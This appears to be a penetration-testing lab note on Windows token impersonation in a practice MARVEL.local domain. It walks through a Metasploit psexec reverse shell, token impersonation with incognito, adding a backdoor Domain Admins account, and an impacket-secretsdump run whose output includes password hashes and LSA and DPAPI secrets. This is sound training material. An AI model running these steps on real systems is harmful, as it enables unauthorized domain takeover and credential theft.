Token Impersonation
What are tokens?
Temporary keys that allow you access to a system/network without having to provide credentials each time you access a file. Think cookies for computers.
Two types:
Delegate – Created for logging into a machine or using Remote Desktop
Impersonate – “non-interactive” such as attaching a network drive or a domain logon script
Example
We can sometimes also find admin tokens.
We can then use it to dump hashes
We can also add a new user to get more access
Exploiting Tokens
1. Get a meterpreter shell
We can use smb psexec to gain a terminal if we have credentials
msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 192.168.145.141:4444
[*] 192.168.145.139:445 - Connecting to the server...
[*] 192.168.145.139:445 - Authenticating to 192.168.145.139:445|MARVEL.local as user 'fcastle'...
[*] 192.168.145.139:445 - Selecting PowerShell target
[*] 192.168.145.139:445 - Executing the payload...
[+] 192.168.145.139:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (201798 bytes) to 192.168.145.139
[*] Meterpreter session 1 opened (192.168.145.141:4444 -> 192.168.145.139:64070) at 2025-05-21 05:13:13 -0400
meterpreter >
User must have logged in to our target machine.
2. Load INCOGNITIO module
meterpreter has some commands that can be used to impersonate tokens.
You need to load the incognitio module.
load incognitoYou can type help and see the supported commands.
List tokens
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
Font Driver Host\UMFD-0
Font Driver Host\UMFD-1
MARVEL\fcastle
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Window Manager\DWM-1
Impersonation Tokens Available
========================================
No tokens availableWe can also list groups
meterpreter > list_tokens -g
Delegation Tokens Available
========================================
\
\Authentication authority asserted identity
BUILTIN\Administrators
BUILTIN\Users
MARVEL\Domain Users
NT AUTHORITY\Authenticated Users
NT AUTHORITY\INTERACTIVE
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\LogonSessionId_0_101431
NT AUTHORITY\LogonSessionId_0_103458Impersonate tokens
meterpreter > impersonate_token marvel\\fcastle
[+] Delegation token available
[+] Successfully impersonated user MARVEL\fcastle
meterpreter > shell
Process 7828 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19045.2006]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
marvel\fcastle
C:\Windows\system32>If you have admin token, you can even impersonate it.
Adding a user
We can even add a user.
C:\Windows\system32>net user /add hawkeye Password1@ /domain
net user /add hawkeye Password1@ /domain
The request will be processed at a domain controller for domain MARVEL.local.
The command completed successfully.
C:\Windows\system32>net group "Domain Admins" hawkeye /ADD /DOMAIN
net group "Domain Admins" hawkeye /ADD /DOMAIN
The request will be processed at a domain controller for domain MARVEL.local.
The command completed successfully.
C:\Windows\system32>Secrets Dump
Now we can use it to dump things.
┌──(kali㉿kali)-[~]
└─$ impacket-secretsdump 'MARVEL.local/hawkeye:Password1@@192.168.145.139'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xec9be313e502a2aa71fd4e8e4c9999d5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6578f05068adb3e4a16d3253bd46bacb:::
frankcastle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
[*] Dumping cached domain logon information (domain/username:hash)
MARVEL.LOCAL/fcastle:$DCC2$10240#fcastle#e6f48c2526bd594441d3da3723155f6f: (2025-05-21 09:14:56)
MARVEL.LOCAL/Administrator:$DCC2$10240#Administrator#c7154f935b7d1ace4c1d72bd4fb7889c: (2025-05-21 09:26:34)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
MARVEL\THEPUNISHER$:aes256-cts-hmac-sha1-96:6a98901004c69df5467cd869f4ea7c1f0e5f3d8848a9549a5aa9b7ba3b3150e4
MARVEL\THEPUNISHER$:aes128-cts-hmac-sha1-96:ec537eb458177012db5ab7997afd825b
MARVEL\THEPUNISHER$:des-cbc-md5:cd4af415fb927af4
MARVEL\THEPUNISHER$:plain_password_hex:660056004b006300470078004000550048004f00570027007200250059002c002600720020006c00500024005e003a005900580058004e005d006700750041002c002d00590030004400640043002f0037007000480065004400660044005600670067005f00290068007a00570037006a002a003200330075003e00750066004400320064007100700035003600710059003d004f00580055005d0065003d0051002f0059006e00690029002f00590020002d006100270069002c003700550047003500570030005d0056002e00780074004e007a003900450071003f0072006e0045004200300058002c0028006f00
MARVEL\THEPUNISHER$:aad3b435b51404eeaad3b435b51404ee:b5458f32b6a10e8482ae7a582f776ab0:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x6174875d29cb646655e1dd49c2853691667f78f2
dpapi_userkey:0xa4d2daa834d71945360ce5b8ac5efcf2a02a9c28
[*] NL$KM
0000 09 9F C6 F6 60 EF 09 3E 30 CC 5B AA C7 AC 5A FB ....`..>0.[...Z.
0010 CA 61 47 50 2D 62 B1 36 D6 59 69 2F 82 CB 81 DE .aGP-b.6.Yi/....
0020 D8 20 BF 99 BA 90 0C 47 10 9E 8E CB F5 01 E2 F0 . .....G........
0030 0C 9C FC 1A BF AD 66 7B 03 11 DA A4 DF CD 60 63 ......f{......`c
NL$KM:099fc6f660ef093e30cc5baac7ac5afbca6147502d62b136d659692f82cb81ded820bf99ba900c47109e8ecbf501e2f00c9cfc1abfad667b0311daa4dfcd6063
[*] Cleaning up...
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry
Last updated